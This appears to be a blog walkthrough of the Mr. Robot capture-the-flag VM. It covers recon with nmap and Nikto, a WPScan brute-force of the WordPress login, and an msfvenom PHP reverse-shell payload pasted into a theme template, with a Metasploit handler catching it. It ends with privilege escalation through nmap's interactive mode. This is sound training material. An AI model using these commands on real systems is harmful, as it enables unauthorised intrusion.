Mr.Robot

Mr. Robot CTF Walkthrough

mr-robot-mask-f-society-artwork-4k-on-3840x2400.jpg

To initially start this, I use netdiscover to find what the IP address of the Vm. Once I found the IP address I then use nmap to scan the open ports and services.
Nmap-sV 192.168.83.160
 

1nmap_orig.png

After the scan completes it shows the port 22, port 80 and port 443 are so I try seeing what the browser will tell us.

2hellofriend_orig.png

The webpage is very well made. We are greeted with a “Hello friend” message. Next I use Nikto.  Nikto is a web server assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server.  https://cirt.net/nikto2-docs/introduction.html
Nikto –h 192.168.83.160
 

3nikto_orig.png

With the name called Mr. Robot, and also with the result in Nikto, I search the robots.txt file in the web browser.

3niktoandrobots_orig.png

Once opened, we see a text and dictornary file. I use wget to save the file to my PC then open to see what the results.
Wget http://192.168.83.160/key-1-of-3.txt
 

4firstflagwget_orig.png

As we can see we have our first flag!
 

Now its time to see what the fsocity.dic has in store for us. 

4fsocity_orig.png

Once opened, I see a very long list of words making it to be a wordlist of some sort. As I look through more nikto results, I notice a wp-login page. Know this is a word press site, I visit the url and prompted with a admin login page

5wplogin_orig.png

At first for just start, I try the default user name and password admin:admin and get negative results. I did notice at the Error for invalid username. After thinking that the CTF is called Mr. Robot, I try the main character first name, Elliot. I then get results of in correct password for the user name Elliot.

6wpscanbrute-pt-1_orig.png

I triedmany different passwords to try to get into the webpage, no luck. Next step I go for is bruteforcing the login with WPscan.
Wpscan –url http://192.168.83.160 –wordlist /YOUR DIRCERTORY/fsocity.dic –username Elliot

6bruteforcefinal_1_orig.png

After 5 hours and 17 minutes according to the Elapsed time, I finally get the password I need to login.
ER28-0653

7login_orig.png

Now im login and have access. Now time to make a shell to gain access further.

8msfvenom_orig.png

I make a code using msfvenom with the following commands:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.83.139 lport=4444 -f raw
Copy the code from <?php to die(); and paste it on template(and save it)

9msfconsole_orig.png

Once uploaded in the PhP. I open metasploitto start a session.
 

Use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.83.139
set lport 4444
exploit

10shell_orig.png

Now after a visit to http://192.168.0.102/wp-content/themes/twentyfifteen/404.php i get a meterpreter session. To obian the shell type
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
This now gives you access.
Using ls –las command gives access about the user information.
cd /home take you to the home folder
cd/robot takes you to the robot folder
 

11ls-lsa_orig.png
12mdaflag2_orig.png

Once I use the ls  command I see the clue for the 2nd flag. So I cat the txt file.
Cat key-2-of-3-txt
Permission denied
I was able to ls  what is inside the txt file. So I move on to the next file listed
Cat password.raw-md5
Once completed I have another clue for the flag2. It’s a md5 hash. So next I need to crack the hash. 
 

13md5crack_orig.png

The value will translate to abcdefghijklmnopqrstuvwxyz
Next I get super user rights to robot  
http://www.linfo.org/su.html
Using the translate I got from the md5 hash I have access.
I do another
Ls –lsa
Then cat the the key txt file
Cat key-2-of-3.txt
Now I have the 2nd flag



     
14flag2_orig.png

Next I use nmap interactive shell to get the 3rd and final flag.
http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref
nmap
Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using a nmap “shell” (interactive shell).
nmap –interactive
With the above commands you will enter nmap then type :
!sh
id (to know the users)
cd /root (lets you to enter root)
 
Once you have enetered the root, type :
ls -lsa
cat key-3-of-3.txt
 

15flag3_orig.png